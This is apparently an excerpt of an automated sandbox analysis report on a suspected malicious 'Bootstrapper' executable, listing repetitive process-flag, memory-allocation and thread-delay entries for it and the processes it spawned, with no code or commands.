Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\monitordll\componentreviewsavesSession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\Bootstrapper.exe	Memory allocated: 163877C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Memory allocated: 163A1290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Memory allocated: 1907BD50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Memory allocated: 1907D740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\monitordll\componentreviewsavesSession.exe	Memory allocated: 21D0000 memory reserve \| memory write watch
Source: C:\monitordll\componentreviewsavesSession.exe	Memory allocated: 1A3F0000 memory reserve \| memory write watch
Source: C:\monitordll\componentreviewsavesSession.exe	Memory allocated: DF0000 memory reserve \| memory write watch
Source: C:\monitordll\componentreviewsavesSession.exe	Memory allocated: 1AB00000 memory reserve \| memory write watch
Source: C:\monitordll\componentreviewsavesSession.exe	Memory allocated: 1370000 memory reserve \| memory write watch
Source: C:\monitordll\componentreviewsavesSession.exe	Memory allocated: 1AE90000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 598905	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 598794	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 598682	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 598566	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 598412	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 598274	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597386	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596059	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 599858	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 599678	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 599233	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 599122	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598468	Jump to behavior
